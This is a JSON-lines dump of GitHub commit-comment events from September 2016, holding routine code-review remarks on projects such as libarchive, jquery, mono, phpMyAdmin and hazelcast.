{"id":"4508519931","type":"CommitCommentEvent","actor":{"login":"mmatuska"},"repo":{"name":"mmatuska/libarchive"},"payload":{"comment":{"id":18880287,"position":51,"line":468,"path":"libarchive/archive_read_disk_entry_from_file.c","commit_id":"0fb4708dcc87db7f8990a021b81aa1f0d6d32e20","created_at":"2016-09-02T13:32:02Z","updated_at":"2016-09-02T13:32:02Z","body":"If we found a NFSv4 ACL and it is trivial we do not want to look for access and defaults ACLs."}},"created_at":"2016-09-02T13:32:02Z"}
{"id":"4508520790","type":"CommitCommentEvent","actor":{"login":"kaueb"},"repo":{"name":"ThallysonB/NewFitnessNatal"},"payload":{"comment":{"id":18880293,"position":20,"line":286,"path":"index.html","commit_id":"8de99755fb5a126b01215e30554e7486f344d9d0","created_at":"2016-09-02T13:32:12Z","updated_at":"2016-09-02T13:32:12Z","body":"Você precisa melhorar a identação do seu HTML, dois elementos, nos quais um está dentro do outro, não devem possuir a mesma identação.\r\n\r\n**WRONG**\r\n```\r\n(...)\r\n</div>\r\n</div>```\r\n\r\n**CORRECT**\r\n```\r\n(...)\r\n  </div>\r\n</div>```"}},"created_at":"2016-09-02T13:32:12Z"}
{"id":"4508525583","type":"CommitCommentEvent","actor":{"login":"mgol"},"repo":{"name":"jquery/jquery"},"payload":{"comment":{"id":18880298,"position":76,"line":203,"path":"src/core.js","commit_id":"f519539d3b7a12b67adc3b2c63a19e3beca33a83","created_at":"2016-09-02T13:33:05Z","updated_at":"2016-09-02T13:33:05Z","body":"Why what?"}},"created_at":"2016-09-02T13:33:05Z"}
{"id":"4508534841","type":"CommitCommentEvent","actor":{"login":"marek-safar"},"repo":{"name":"mono/mono"},"payload":{"comment":{"id":18880332,"position":16,"line":284,"path":"mono/metadata/icall-def.h","commit_id":"f61f85579443e6f684f67bc7d2c548b5f5e202f2","created_at":"2016-09-02T13:34:52Z","updated_at":"2016-09-02T13:34:52Z","body":"This change requires mono_corlib_version bump"}},"created_at":"2016-09-02T13:34:52Z"}
{"id":"4508538174","type":"CommitCommentEvent","actor":{"login":"danieldietrich"},"repo":{"name":"javaslang/javaslang"},"payload":{"comment":{"id":18880343,"position":9,"line":57,"path":"javaslang/src/main/java/javaslang/collection/HashArrayMappedTrie.java","commit_id":"61049351a516f43d1b064e4240fae7addcd23585","created_at":"2016-09-02T13:35:34Z","updated_at":"2016-09-02T13:35:34Z","body":"was that a bug-fix that should be released with 2.0.4?"}},"created_at":"2016-09-02T13:35:34Z"}
{"id":"4508539119","type":"CommitCommentEvent","actor":{"login":"mmatuska"},"repo":{"name":"mmatuska/libarchive"},"payload":{"comment":{"id":18880345,"position":3,"line":421,"path":"libarchive/archive_read_disk_entry_from_file.c","commit_id":"66cb7452cb00bf8de01bd9d4c3a5cb2db0b62744","created_at":"2016-09-02T13:35:45Z","updated_at":"2016-09-02T13:35:45Z","body":"If we don't have a fd and we are inside a subdirectory we need to set `a->tree_enter_working_dir()` otherwise `acl_get_file()` will always lookup a file in the top level directory, which remains current. This code is analogous to the code in `setup_xattrs()`."}},"created_at":"2016-09-02T13:35:45Z"}
{"id":"4508540222","type":"CommitCommentEvent","actor":{"login":"mmatuska"},"repo":{"name":"mmatuska/libarchive"},"payload":{"comment":{"id":18880348,"position":26,"line":443,"path":"libarchive/archive_read_disk_entry_from_file.c","commit_id":"66cb7452cb00bf8de01bd9d4c3a5cb2db0b62744","created_at":"2016-09-02T13:35:59Z","updated_at":"2016-09-02T13:35:59Z","body":"`acl_get_fd()` always gets only POSIX.1e ACLs on FreeBSD. We need `acl_get_fd_np()` here."}},"created_at":"2016-09-02T13:35:59Z"}
{"id":"4508541579","type":"CommitCommentEvent","actor":{"login":"marcelfarres"},"repo":{"name":"pylls/datatrack"},"payload":{"comment":{"id":18880353,"position":4,"line":75,"path":"database/database_test.go","commit_id":"591e7e5158fff8307beb49fd602d98a64c73f988","created_at":"2016-09-02T13:36:16Z","updated_at":"2016-09-02T13:36:16Z","body":"You can also declare `var (att ... err ... )` and use \r\nif att, err = GetAttribute(id); err !=nil {\r\n     t.Fatalf(\"failed to get attribute: %s\", err)\r\n}"}},"created_at":"2016-09-02T13:36:16Z"}
{"id":"4508545227","type":"CommitCommentEvent","actor":{"login":"mmatuska"},"repo":{"name":"mmatuska/libarchive"},"payload":{"comment":{"id":18880363,"position":41,"line":458,"path":"libarchive/archive_read_disk_entry_from_file.c","commit_id":"66cb7452cb00bf8de01bd9d4c3a5cb2db0b62744","created_at":"2016-09-02T13:37:00Z","updated_at":"2016-09-02T13:37:00Z","body":"We definitely do not want to check if a NULL ACL is trivial and we do not want to deal with unintialized r if acl_is_trivial_np() fails."}},"created_at":"2016-09-02T13:37:00Z"}
{"id":"4508546581","type":"CommitCommentEvent","actor":{"login":"mmatuska"},"repo":{"name":"mmatuska/libarchive"},"payload":{"comment":{"id":18880365,"position":50,"line":467,"path":"libarchive/archive_read_disk_entry_from_file.c","commit_id":"66cb7452cb00bf8de01bd9d4c3a5cb2db0b62744","created_at":"2016-09-02T13:37:17Z","updated_at":"2016-09-02T13:37:17Z","body":"If we found a NFSv4 ACL and it is trivial we do not want to look for access and defaults ACLs."}},"created_at":"2016-09-02T13:37:17Z"}
{"id":"4508549848","type":"CommitCommentEvent","actor":{"login":"mmatuska"},"repo":{"name":"mmatuska/libarchive"},"payload":{"comment":{"id":18880375,"position":69,"line":494,"path":"libarchive/archive_read_disk_entry_from_file.c","commit_id":"66cb7452cb00bf8de01bd9d4c3a5cb2db0b62744","created_at":"2016-09-02T13:37:54Z","updated_at":"2016-09-02T13:37:54Z","body":"We want to do the triviality check for POSIX.1e access ACLs, too."}},"created_at":"2016-09-02T13:37:54Z"}
{"id":"4508552977","type":"CommitCommentEvent","actor":{"login":"wirsindpapst"},"repo":{"name":"wirsindpapst/clmystery"},"payload":{"comment":{"id":18880381,"position":null,"line":null,"path":null,"commit_id":"e0cbc3c8d96d7b1b4cc8cd08330bd12163f4de2b","created_at":"2016-09-02T13:38:30Z","updated_at":"2016-09-02T13:38:30Z","body":"Please note the file would appear to already have the the correct permissions as per the instruction (user  read and write, group read only), therefore no modifications were used using the chmod command. Please advise if I have misunderstood any part of this.\r\n\r\nThanks!\r\n\r\n![screen shot 2016-09-02 at 14 37 35](https://cloud.githubusercontent.com/assets/15246929/18205610/ce8adb98-711a-11e6-9e4f-0921f229febd.png)\r\n"}},"created_at":"2016-09-02T13:38:30Z"}
{"id":"4508553885","type":"CommitCommentEvent","actor":{"login":"yossigil"},"repo":{"name":"SpartanRefactoring/spartan-refactoring"},"payload":{"comment":{"id":18880386,"position":null,"line":null,"path":null,"commit_id":"993dee596fd1af727b30e3490361b0124115cfb9","created_at":"2016-09-02T13:38:41Z","updated_at":"2016-09-02T13:38:41Z","body":"@NivShalmon : there must be a bug here, with a=f() being now inlined into a loop\r\nsuch as int a =f(); for (i = 1; i < a; i++)\r\nThis should not be inlined"}},"created_at":"2016-09-02T13:38:41Z"}
{"id":"4508553976","type":"CommitCommentEvent","actor":{"login":"devenbansod"},"repo":{"name":"phpmyadmin/phpmyadmin"},"payload":{"comment":{"id":18880387,"position":null,"line":null,"path":null,"commit_id":"761281f70ca82a83174d0d50ce57155bd33f75f5","created_at":"2016-09-02T13:38:42Z","updated_at":"2016-09-02T13:38:42Z","body":"This does not let me logout of phpMyAdmin as the link on top of navigation panel sends a simple GET request to logout.php. \r\nAlso, if we remove this POST-only restriction, then `$token_mismatch` has to be defined above the if-block (where it is currently defined) in common.inc.php. "}},"created_at":"2016-09-02T13:38:42Z"}
{"id":"4508554018","type":"CommitCommentEvent","actor":{"login":"mmatuska"},"repo":{"name":"mmatuska/libarchive"},"payload":{"comment":{"id":18880388,"position":83,"line":508,"path":"libarchive/archive_read_disk_entry_from_file.c","commit_id":"66cb7452cb00bf8de01bd9d4c3a5cb2db0b62744","created_at":"2016-09-02T13:38:42Z","updated_at":"2016-09-02T13:38:42Z","body":"Set the acl pointer to NULL."}},"created_at":"2016-09-02T13:38:42Z"}
{"id":"4508564002","type":"CommitCommentEvent","actor":{"login":"NivShalmon"},"repo":{"name":"SpartanRefactoring/spartan-refactoring"},"payload":{"comment":{"id":18880405,"position":null,"line":null,"path":null,"commit_id":"993dee596fd1af727b30e3490361b0124115cfb9","created_at":"2016-09-02T13:40:40Z","updated_at":"2016-09-02T13:40:40Z","body":"Hmm, this is odd, since all I did was inline the casting.It also didn't change the number of failed tests. I'll revert this for now and look further into it"}},"created_at":"2016-09-02T13:40:40Z"}
{"id":"4508567580","type":"CommitCommentEvent","actor":{"login":"macumber"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18880414,"position":29,"line":29,"path":"openstudiocore/pat/CMakeLists.txt","commit_id":"fe0bb045b94499266f87c29ea049b4be090422a1","created_at":"2016-09-02T13:41:20Z","updated_at":"2016-09-02T13:41:20Z","body":"i wouldnt really want the sha in the install directory, is it?\r\n"}},"created_at":"2016-09-02T13:41:20Z"}
{"id":"4508567824","type":"CommitCommentEvent","actor":{"login":"sebbekarlsson"},"repo":{"name":"jquery/jquery"},"payload":{"comment":{"id":18880415,"position":76,"line":203,"path":"src/core.js","commit_id":"f519539d3b7a12b67adc3b2c63a19e3beca33a83","created_at":"2016-09-02T13:41:20Z","updated_at":"2016-09-02T13:41:20Z","body":"noop ?"}},"created_at":"2016-09-02T13:41:20Z"}
{"id":"4508569988","type":"CommitCommentEvent","actor":{"login":"macumber"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18880422,"position":4,"line":4,"path":"openstudiocore/pat/DownloadPat.cmake","commit_id":"fe0bb045b94499266f87c29ea049b4be090422a1","created_at":"2016-09-02T13:41:47Z","updated_at":"2016-09-02T13:41:47Z","body":"hooray!"}},"created_at":"2016-09-02T13:41:47Z"}
{"id":"4508572168","type":"CommitCommentEvent","actor":{"login":"socheres"},"repo":{"name":"UB-Mannheim/zotkat"},"payload":{"comment":{"id":18880427,"position":56,"line":154,"path":"PicaSWB.js","commit_id":"626f8a26af02422a5eb4db2331f2201a295fe509","created_at":"2016-09-02T13:42:13Z","updated_at":"2016-09-02T13:42:13Z","body":"@zuphilip wenn beim Download ins Zotero kein ISSN vorhanden ist, soll nur \"0500\" stehen. Jetzt sieht das Exportergebnis  aber wie folgt aus: 0500 [object Object]ou[object Object]"}},"created_at":"2016-09-02T13:42:13Z"}
{"id":"4508572660","type":"CommitCommentEvent","actor":{"login":"mcb30"},"repo":{"name":"mcb30/odoo"},"payload":{"comment":{"id":18880428,"position":null,"line":null,"path":null,"commit_id":"3dbdbe6969685cc8043cf7a4bb6425841d7bb6b9","created_at":"2016-09-02T13:42:18Z","updated_at":"2016-09-02T13:42:18Z","body":"On 02/09/16 10:52, vladimir-iliev wrote:\n> this won't work correctly if you add force_company in multi company setup\n\nAs far as I can tell, the return value from _company_default_get() is \ncompletely unaffected by force_company.  Please recheck and confirm \neither way.\n\nThanks,\n\nMichael\n"}},"created_at":"2016-09-02T13:42:18Z"}
{"id":"4508573972","type":"CommitCommentEvent","actor":{"login":"mmatuska"},"repo":{"name":"mmatuska/libarchive"},"payload":{"comment":{"id":18880430,"position":68,"line":493,"path":"libarchive/archive_read_disk_entry_from_file.c","commit_id":"66cb7452cb00bf8de01bd9d4c3a5cb2db0b62744","created_at":"2016-09-02T13:42:34Z","updated_at":"2016-09-02T13:42:34Z","body":"We want to do the triviality check for POSIX.1e access ACLs, too."}},"created_at":"2016-09-02T13:42:34Z"}
{"id":"4508574041","type":"CommitCommentEvent","actor":{"login":"yohanboniface"},"repo":{"name":"ideascube/ansiblecube"},"payload":{"comment":{"id":18880431,"position":12,"line":425,"path":"roles/set_custom_fact/files/device_list.fact","commit_id":"56330b5361ab7a8b9ce43b124c54c152c0bbb144","created_at":"2016-09-02T13:42:35Z","updated_at":"2016-09-02T13:42:35Z","body":"Not sure what those are for exactly, but my plan is to add all the zims we have in the red cross koombook."}},"created_at":"2016-09-02T13:42:35Z"}
{"id":"4508574221","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":18880432,"position":null,"line":null,"path":null,"commit_id":"5b93d8c1db6755b0e5ff9ef1b60f1f2c686b574b","created_at":"2016-09-02T13:42:37Z","updated_at":"2016-09-02T13:42:37Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=2)"}},"created_at":"2016-09-02T13:42:37Z"}
{"id":"4508575775","type":"CommitCommentEvent","actor":{"login":"scottgonzalez"},"repo":{"name":"jquery/jquery"},"payload":{"comment":{"id":18880438,"position":76,"line":203,"path":"src/core.js","commit_id":"f519539d3b7a12b67adc3b2c63a19e3beca33a83","created_at":"2016-09-02T13:42:53Z","updated_at":"2016-09-02T13:42:53Z","body":"http://api.jquery.com/jQuery.noop/"}},"created_at":"2016-09-02T13:42:53Z"}
{"id":"4508583670","type":"CommitCommentEvent","actor":{"login":"yossigil"},"repo":{"name":"SpartanRefactoring/spartan-refactoring"},"payload":{"comment":{"id":18880463,"position":null,"line":null,"path":null,"commit_id":"993dee596fd1af727b30e3490361b0124115cfb9","created_at":"2016-09-02T13:44:31Z","updated_at":"2016-09-02T13:44:31Z","body":"Could be that the test failed earlier, but if you get into the heart of it, please look into it"}},"created_at":"2016-09-02T13:44:31Z"}
{"id":"4508586047","type":"CommitCommentEvent","actor":{"login":"Gama11"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":18880470,"position":6,"line":623,"path":"src/display/display.ml","commit_id":"c1620b6354d991d416c4e91eca8c40a050153b2a","created_at":"2016-09-02T13:44:59Z","updated_at":"2016-09-02T13:44:59Z","body":"As long as it's not month..."}},"created_at":"2016-09-02T13:44:59Z"}
{"id":"4508589606","type":"CommitCommentEvent","actor":{"login":"gregvenech"},"repo":{"name":"webpack/webpack.io"},"payload":{"comment":{"id":18880475,"position":null,"line":null,"path":null,"commit_id":"27ac88298b2fc961e4bda388d71d7cca6c45a8e3","created_at":"2016-09-02T13:45:38Z","updated_at":"2016-09-02T13:45:38Z","body":"@bebraw thanks, I've had to fix incorrect languages a few times now and I also updated the `highlight.js` module to be more descriptive on error. I think what's happening is that, in the terminal, you only see highlight errors when first running `npm start` or `npm run build` but once the dev-server is up it's fairly quiet (although I think you might see the warnings in the browser console).\r\n\r\nI saw you created an issue for linting markdown which would be great, there's also a few other funny behaviors (such as when working on components) that I've noticed on the dev-server. If you want I'll try to track these better and maybe create an issue in Antwar with suggestions/notes."}},"created_at":"2016-09-02T13:45:38Z"}
{"id":"4508594742","type":"CommitCommentEvent","actor":{"login":"jorgepinto"},"repo":{"name":"beeverycreative/BEEwebPi"},"payload":{"comment":{"id":18880487,"position":null,"line":null,"path":null,"commit_id":"1ab6d330f58d2cf0e25e8469e606e2eab94584d8","created_at":"2016-09-02T13:46:38Z","updated_at":"2016-09-02T13:46:38Z","body":"Thanks anthonyangel!!\r\n\r\nAre you using BEEweb software? If you have any questions, please use our forum (http://beeverycreative.com/forum/), ask here on Github or contact me: jpinto@beeverycreative.com."}},"created_at":"2016-09-02T13:46:38Z"}
{"id":"4508598696","type":"CommitCommentEvent","actor":{"login":"yossigil"},"repo":{"name":"SpartanRefactoring/spartan-refactoring"},"payload":{"comment":{"id":18880496,"position":null,"line":null,"path":null,"commit_id":"d794efad94f5589d7ddaba73330e4cf0e0c60118","created_at":"2016-09-02T13:47:24Z","updated_at":"2016-09-02T13:47:24Z","body":"There is a but that I discovered in the process.\r\n\r\nYou convert a.f().toString().g()\r\ninto \r\n```\r\n\"\" + f().toString.g()\r\n```\r\nthis is a bug, since you must put paretnthesis.\r\n"}},"created_at":"2016-09-02T13:47:24Z"}
{"id":"4508599232","type":"CommitCommentEvent","actor":{"login":"NivShalmon"},"repo":{"name":"SpartanRefactoring/spartan-refactoring"},"payload":{"comment":{"id":18880501,"position":null,"line":null,"path":null,"commit_id":"993dee596fd1af727b30e3490361b0124115cfb9","created_at":"2016-09-02T13:47:31Z","updated_at":"2016-09-02T13:47:31Z","body":"Just checked, this test fails regadless of this change, along with 37 other tests. I'll try and see why this happens, but for now I'll return this change"}},"created_at":"2016-09-02T13:47:31Z"}
{"id":"4508601563","type":"CommitCommentEvent","actor":{"login":"ilya-g"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18880503,"position":5,"line":0,"path":"js/js.libraries/src/core/collections/InternalHashCodeMap.kt","commit_id":"b79a2e1a1abf0d297f1ac2b72a7995ea54d6c5a6","created_at":"2016-09-02T13:47:58Z","updated_at":"2016-09-02T13:47:58Z","body":"Only HashCode atm, possible to use something else later to implement `IdentityMap` for example."}},"created_at":"2016-09-02T13:47:58Z"}
{"id":"4508603674","type":"CommitCommentEvent","actor":{"login":"ilya-g"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18880508,"position":null,"line":null,"path":null,"commit_id":"fc89d6edd9d0ddc0fd035a47c62a060fb94a55d7","created_at":"2016-09-02T13:48:24Z","updated_at":"2016-09-02T13:48:24Z","body":"|`js/js.libraries/src/core/collections/LinkedHashMap.kt:24`|\n|---|\nthe heritage of JDK"}},"created_at":"2016-09-02T13:48:24Z"}
{"id":"4508606883","type":"CommitCommentEvent","actor":{"login":"paly2"},"repo":{"name":"paly2/Mynetest-server"},"payload":{"comment":{"id":18880511,"position":18,"line":14,"path":"scripts/run.sh","commit_id":"49f3d1c77d51fcf506d5fae4557b98546c655854","created_at":"2016-09-02T13:48:58Z","updated_at":"2016-09-02T13:48:58Z","body":"I know, this 1% is voluntary, because the mtwebmapper uses a lot of CPU if its usage is not limited (but strangely, it works as well if it is limited). If I give 2% to mtwebmapper, then I will use them everytime (I tested), as it uses its 1% everytime, but it does not look working better. 1% is enough (look, it is fast enough: http://paly2.ddns.net:8808).\r\n\r\nI have two CPU cores, but I do not think that mtwebmapper is multi-threaded, so you are right, the `-c 1` option is probably useless."}},"created_at":"2016-09-02T13:48:58Z"}
{"id":"4508607000","type":"CommitCommentEvent","actor":{"login":"EddydeLange"},"repo":{"name":"davinci-ao/wiebenik"},"payload":{"comment":{"id":18880512,"position":null,"line":null,"path":null,"commit_id":"997cc056a056d1300695fdacad30f1b271964cb0","created_at":"2016-09-02T13:49:00Z","updated_at":"2016-09-02T13:49:00Z","body":"nice"}},"created_at":"2016-09-02T13:49:00Z"}
{"id":"4508607913","type":"CommitCommentEvent","actor":{"login":"jbblanchet"},"repo":{"name":"juanomgpt/iso-10383"},"payload":{"comment":{"id":18880513,"position":null,"line":null,"path":null,"commit_id":"8d96c085f10505514a5d899920f791286bdbe27a","created_at":"2016-09-02T13:49:12Z","updated_at":"2016-09-02T13:49:12Z","body":"Looks good. I have some suggestions about the linting, but I'll open a PR for it"}},"created_at":"2016-09-02T13:49:12Z"}
{"id":"4508608376","type":"CommitCommentEvent","actor":{"login":"AlbertWuYZ"},"repo":{"name":"DingGuodong/GoogleHostsFileForLinux"},"payload":{"comment":{"id":18880514,"position":null,"line":null,"path":null,"commit_id":"f9a55280e645a38b2c98be6476a9a94465acd157","created_at":"2016-09-02T13:49:17Z","updated_at":"2016-09-02T13:49:17Z","body":"I am a rookie. I did what you told, but still couldn't work.\r\n\"./replaceLocalHostsFileAgainstGfw.sh: line 501: curl: command not found\"\r\nI don't know how to solve this problem.\r\nThank you for what you have done."}},"created_at":"2016-09-02T13:49:17Z"}
{"id":"4508609115","type":"CommitCommentEvent","actor":{"login":"bebraw"},"repo":{"name":"webpack/webpack.io"},"payload":{"comment":{"id":18880516,"position":null,"line":null,"path":null,"commit_id":"27ac88298b2fc961e4bda388d71d7cca6c45a8e3","created_at":"2016-09-02T13:49:26Z","updated_at":"2016-09-02T13:49:26Z","body":"Yeah, feel free to open issues. 👍 "}},"created_at":"2016-09-02T13:49:26Z"}
{"id":"4508610280","type":"CommitCommentEvent","actor":{"login":"lrq3000"},"repo":{"name":"tqdm/tqdm"},"payload":{"comment":{"id":18880519,"position":57,"line":1348,"path":"tqdm/tests/tests_tqdm.py","commit_id":"0b77677ca7497883c65907da9f4cf0adfca3bc67","created_at":"2016-09-02T13:49:39Z","updated_at":"2016-09-02T13:49:39Z","body":"Can't, it breaks flake8."}},"created_at":"2016-09-02T13:49:39Z"}
{"id":"4508615915","type":"CommitCommentEvent","actor":{"login":"yama"},"repo":{"name":"modxcms/evolution"},"payload":{"comment":{"id":18880530,"position":null,"line":null,"path":null,"commit_id":"f17de0417565f0324adb3f67687cf4a6b839059b","created_at":"2016-09-02T13:50:42Z","updated_at":"2016-09-02T13:50:42Z","body":"Maybe, this is old bug."}},"created_at":"2016-09-02T13:50:42Z"}
{"id":"4508617119","type":"CommitCommentEvent","actor":{"login":"agdl"},"repo":{"name":"arduino-libraries/USBHost"},"payload":{"comment":{"id":18880534,"position":null,"line":null,"path":null,"commit_id":"36eb03011156c431ef96d936dd224ec917bd5c6b","created_at":"2016-09-02T13:50:56Z","updated_at":"2016-09-02T13:50:56Z","body":"Fixed with a0f9e00"}},"created_at":"2016-09-02T13:50:56Z"}
{"id":"4508620638","type":"CommitCommentEvent","actor":{"login":"jmontoyaa"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":18880555,"position":null,"line":null,"path":null,"commit_id":"ca61bcedb2488a6291ca8c8e53a7ba436fc310e9","created_at":"2016-09-02T13:51:35Z","updated_at":"2016-09-02T13:51:35Z","body":"Esto no fue arreglado en su momento y ahora ocasiona un error en BT#11588"}},"created_at":"2016-09-02T13:51:35Z"}
{"id":"4508621545","type":"CommitCommentEvent","actor":{"login":"karies"},"repo":{"name":"paulgessinger/root"},"payload":{"comment":{"id":18880558,"position":null,"line":null,"path":null,"commit_id":"05b23bf4abdd8c9b6b11405efbf645864c0df32e","created_at":"2016-09-02T13:51:46Z","updated_at":"2016-09-02T13:51:46Z","body":"Confirmed, yay! Thanks, Paul!"}},"created_at":"2016-09-02T13:51:46Z"}
{"id":"4508623572","type":"CommitCommentEvent","actor":{"login":"jerrinot"},"repo":{"name":"jerrinot/hazelcast"},"payload":{"comment":{"id":18880564,"position":5,"line":230,"path":"hazelcast-client/src/main/java/com/hazelcast/client/connection/nio/ClientConnection.java","commit_id":"db22f084face949551dcd05a6dc3afbf899fab54","created_at":"2016-09-02T13:52:12Z","updated_at":"2016-09-02T13:52:12Z","body":"just an address is not enough"}},"created_at":"2016-09-02T13:52:12Z"}
{"id":"4508626183","type":"CommitCommentEvent","actor":{"login":"jerrinot"},"repo":{"name":"jerrinot/hazelcast"},"payload":{"comment":{"id":18880568,"position":6,"line":220,"path":"hazelcast-client/src/main/java/com/hazelcast/client/connection/nio/ClientConnectionManagerImpl.java","commit_id":"db22f084face949551dcd05a6dc3afbf899fab54","created_at":"2016-09-02T13:52:41Z","updated_at":"2016-09-02T13:52:41Z","body":"there is little difference between not having a connection and having a closed connection. "}},"created_at":"2016-09-02T13:52:41Z"}
{"id":"4508629429","type":"CommitCommentEvent","actor":{"login":"ruslansennov"},"repo":{"name":"javaslang/javaslang"},"payload":{"comment":{"id":18880576,"position":9,"line":57,"path":"javaslang/src/main/java/javaslang/collection/HashArrayMappedTrie.java","commit_id":"61049351a516f43d1b064e4240fae7addcd23585","created_at":"2016-09-02T13:53:19Z","updated_at":"2016-09-02T13:53:19Z","body":"Of course. This commit fixes out of bounds exception (see `testDeepestTree()`)"}},"created_at":"2016-09-02T13:53:19Z"}
{"id":"4508629462","type":"CommitCommentEvent","actor":{"login":"jerrinot"},"repo":{"name":"jerrinot/hazelcast"},"payload":{"comment":{"id":18880577,"position":75,"line":423,"path":"hazelcast-client/src/main/java/com/hazelcast/client/connection/nio/ClientConnectionManagerImpl.java","commit_id":"db22f084face949551dcd05a6dc3afbf899fab54","created_at":"2016-09-02T13:53:20Z","updated_at":"2016-09-02T13:53:20Z","body":"if connection is not alive then the heartbeater can destroy it. "}},"created_at":"2016-09-02T13:53:20Z"}
{"id":"4508631497","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":18880582,"position":null,"line":null,"path":null,"commit_id":"f97e888739c03e58c6868dbf27693c8fa51e6017","created_at":"2016-09-02T13:53:42Z","updated_at":"2016-09-02T13:53:42Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#cUz3FaRmTkOJErM3vLRjRw"}},"created_at":"2016-09-02T13:53:42Z"}
{"id":"4508636254","type":"CommitCommentEvent","actor":{"login":"beretta42"},"repo":{"name":"EtchedPixels/FUZIX"},"payload":{"comment":{"id":18880594,"position":null,"line":null,"path":null,"commit_id":"928594c942420adabd8b5827f0adff9b93353998","created_at":"2016-09-02T13:54:34Z","updated_at":"2016-09-02T13:54:34Z","body":"yup... that hits the spot."}},"created_at":"2016-09-02T13:54:34Z"}
{"id":"4508637383","type":"CommitCommentEvent","actor":{"login":"dozencrows"},"repo":{"name":"apitrace/apitrace"},"payload":{"comment":{"id":18880601,"position":5,"line":288,"path":"lib/os/os_posix.cpp","commit_id":"886e2aeefb352550831aa04643b817926bf7ef01","created_at":"2016-09-02T13:54:47Z","updated_at":"2016-09-02T13:54:47Z","body":"This breaks the android build with:\r\n`apitrace/lib/os/os_posix.cpp: In function 'void os::abort()':\r\napitrace/lib/os/os_posix.cpp:288:12: error: '_Exit' was not declared in this scope\r\n     _Exit(1);`"}},"created_at":"2016-09-02T13:54:47Z"}
{"id":"4508637512","type":"CommitCommentEvent","actor":{"login":"madhuthorat"},"repo":{"name":"madhuthorat/nfs-ganesha"},"payload":{"comment":{"id":18880603,"position":57,"line":79,"path":"src/Protocols/RQUOTA/rquota_setquota.c","commit_id":"05247766eb4590dbdcbb728b6e35304deda4bae0","created_at":"2016-09-02T13:54:49Z","updated_at":"2016-09-02T13:54:49Z","body":"Please note that the changes/additions in the above are only at lines 58, 69, 74, 79. But because of replacing \"spaces\" by \"tabs\" as suggested by checkpatch, it seems as if there were many changes."}},"created_at":"2016-09-02T13:54:49Z"}
{"id":"4508638399","type":"CommitCommentEvent","actor":{"login":"mcb30"},"repo":{"name":"mcb30/odoo"},"payload":{"comment":{"id":18880605,"position":null,"line":null,"path":null,"commit_id":"273d6d9db365fc66fbfb294cc8cf2406ea9accba","created_at":"2016-09-02T13:54:59Z","updated_at":"2016-09-02T13:54:59Z","body":"On 02/09/16 10:59, vladimir-iliev wrote:\n> this also won't work correctly with force_company, in multi company\n> setup or if someone changes user's company, while there's is a cached value\n\nGood catch on force_company.  I've changed this to use \normcache_context() and rebased the branch.  New commit is 3e8a005.\n\n@tools.ormcache seems to provide a clear_cache() method, and I do see \nsome calls to clear_cache() and clear_caches() dotted around the \ncodebase.  Changing a user's company should be a very rare event and \nthere is already custom code handling company_id changes in \nres_partner.write().  Would it make sense to include an appropriate call \nto clear_cache[s]() here?\n\nThanks,\n\nMichael\n"}},"created_at":"2016-09-02T13:54:59Z"}
{"id":"4508639468","type":"CommitCommentEvent","actor":{"login":"nathalierog"},"repo":{"name":"davinci-ao/wiebenik"},"payload":{"comment":{"id":18880609,"position":null,"line":null,"path":null,"commit_id":"997cc056a056d1300695fdacad30f1b271964cb0","created_at":"2016-09-02T13:55:12Z","updated_at":"2016-09-02T13:55:12Z","body":"fair enough :+1"}},"created_at":"2016-09-02T13:55:12Z"}
{"id":"4508639845","type":"CommitCommentEvent","actor":{"login":"ywarnier"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":18880611,"position":null,"line":null,"path":null,"commit_id":"ca61bcedb2488a6291ca8c8e53a7ba436fc310e9","created_at":"2016-09-02T13:55:16Z","updated_at":"2016-09-02T13:55:16Z","body":"@jmontoyaa Entendido. Llegaste a corregirlo de algun lado? De lo que puedo ver no está grabando esto en base de datos, así que el daño es reducido."}},"created_at":"2016-09-02T13:55:16Z"}
{"id":"4508640768","type":"CommitCommentEvent","actor":{"login":"nathalierog"},"repo":{"name":"davinci-ao/wiebenik"},"payload":{"comment":{"id":18880614,"position":null,"line":null,"path":null,"commit_id":"997cc056a056d1300695fdacad30f1b271964cb0","created_at":"2016-09-02T13:55:25Z","updated_at":"2016-09-02T13:55:25Z","body":"fair enough :+1: "}},"created_at":"2016-09-02T13:55:25Z"}
{"id":"4508641488","type":"CommitCommentEvent","actor":{"login":"dequis"},"repo":{"name":"EionRobb/funyahoo-plusplus"},"payload":{"comment":{"id":18880618,"position":null,"line":null,"path":null,"commit_id":"70b3715f3386219885ec9eb8a04fcb651c2034c8","created_at":"2016-09-02T13:55:33Z","updated_at":"2016-09-02T13:55:33Z","body":"This is not the right place to post comments like that. Please open a new issue in the issue tracker https://github.com/EionRobb/funyahoo-plusplus/issues/new"}},"created_at":"2016-09-02T13:55:33Z"}
{"id":"4508642527","type":"CommitCommentEvent","actor":{"login":"escardin"},"repo":{"name":"auth0/angular2-jwt"},"payload":{"comment":{"id":18880619,"position":24,"line":228,"path":"angular2-jwt.ts","commit_id":"4e85b828b36b322482c2a4e8e46e58172016adcc","created_at":"2016-09-02T13:55:44Z","updated_at":"2016-09-02T13:55:44Z","body":"This check doesn't check if the token has expired. It is only checking if the seconds match. It basically breaks the token expired check if the seconds match. As it is, the token is guaranteed to be valid for 1 second out of every 60, in perpetuity."}},"created_at":"2016-09-02T13:55:44Z"}
